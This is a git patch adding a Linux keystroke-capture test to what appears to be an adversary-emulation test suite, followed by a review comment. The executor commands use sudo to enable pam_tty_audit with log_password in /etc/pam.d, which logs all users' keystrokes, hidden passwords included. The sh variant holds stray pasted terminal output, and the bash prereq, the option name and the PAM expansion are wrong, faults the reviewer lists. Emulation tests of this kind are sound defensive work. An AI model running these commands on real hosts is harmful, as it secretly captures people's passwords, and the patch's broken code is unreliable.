From 84a16f7a6a92c88d9be6dfd552b30a7ae5607124 Mon Sep 17 00:00:00 2001
From: JB <35406993+cherokeejb@users.noreply.github.com>
Date: Thu, 13 Aug 2020 23:13:23 -0500
Subject: [PATCH] Added new test, test 2 "Living off the land Terminal Input Capture on Linux with pam.d" Added for both bash and sh, including cleanup and prereq. might be useful to add get_prereq later, that would make it more noisy and not truly 'living off the land', then.
---
 atomics/T1056.001/T1056.001.yaml | 51 +++++++++++++++++++++++++++++++-
 1 file changed, 50 insertions(+), 1 deletion(-)
diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml
index 18a9a109..0cbf242c 100644
--- a/atomics/T1056.001/T1056.001.yaml
+++ b/atomics/T1056.001/T1056.001.yaml
@@ -23,4 +23,53 @@ atomic_tests:
 cleanup_command: |
 Remove-Item $env:TEMP\key.log -ErrorAction Ignore
 name: powershell
- elevation_required: true
\ No newline at end of file
+ elevation_required: true
+ - name: Living off the land Terminal Input Capture on Linux with pam.d
+ description: |
+ Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log.
+
+ Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command).
+
+ Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library.
+ prereq_command: |
+ if [-f /usr/lib/pam/pam_tty_audit.so ]; then exit 0; else exit 1; fi
+ - linux
+ executor:
+ command: |
+ if [ -f /etc/pam.d/password-auth ]; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi;
+ if [ -f /etc/pam.d/system-auth ]; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi;
+ sudo touch /tmp/password-auth.bk
+ sudo touch /tmp/system-auth.bk
+ sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/password-auth
+ sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/system-auth
+ sudo pam-auth-update --package --force
+ cleanup_command: |
+ sudo mv /tmp/password-auth.bk /etc/pam.d/password-auth
+ sudo mv /tmp/system-auth.bk /etc/pam.d/system-auth
+ name: bash
+ elevation_required: true
+ - name: Living off the land Terminal Input Capture on Linux with pam.d
+ description: |
+ Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log.
+
+ Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command).
+
+ Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library.
+ prereq_command: |
+ if test -f /usr/lib/pam/pam_tty_audit.so; then exit 0; else exit 1; fi
+ - linux
+ executor:
+ command: |if test -f "foobo"; then echo "heya"; else "nope";fi
+heya
+ if test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi;
+ if test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi;
+ sudo touch /tmp/password-auth.bk
+ sudo touch /tmp/system-auth.bk
+ sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/password-auth
+ sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/system-auth
+ sudo pam-auth-update --package --force
+ cleanup_command: |
+ sudo mv /tmp/password-auth.bk /etc/pam.d/password-auth
+ sudo mv /tmp/system-auth.bk /etc/pam.d/system-auth
+ name: sh
+ elevation_required: true
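Review bot: The sh test's executor is not loadable YAML: `command: |if test -f "foobo"; then echo "heya"; else "nope";fi` puts content on the block-scalar indicator line, and the following `heya` at column 0 is pasted terminal output that terminates the `atomic_tests` structure, so both lines should collapse to a bare `command: |`. In the bash test the prereq `if [-f /usr/lib/pam/pam_tty_audit.so ]; then exit 0; else exit 1; fi` is missing the space after `[`, so the test command is never found and the prereq always exits 1; it should read `if [ -f /usr/lib/pam/pam_tty_audit.so ]; then exit 0; else exit 1; fi` (the sh variant's `test -f` form is fine). Both tests list `- linux` with no `supported_platforms:` key visible above it (indentation is lost in this view, so confirm against the file), and both descriptions say `'log_passwd'` while the commands write `log_password`, so one of the two is wrong; the description also expands PAM as `Pluggable Access Module` where it is Pluggable Authentication Modules. The cleanup moves `/tmp/password-auth.bk` and `/tmp/system-auth.bk` back unconditionally, so on a host where those `/etc/pam.d` files did not exist the `touch`ed empty backup is installed as a new file; cleanup should restore only backups taken from real files, and note that in `sudo echo "..." >> /etc/pam.d/password-auth` the `sudo` covers `echo` only while the shell opens the redirect target as the invoking user.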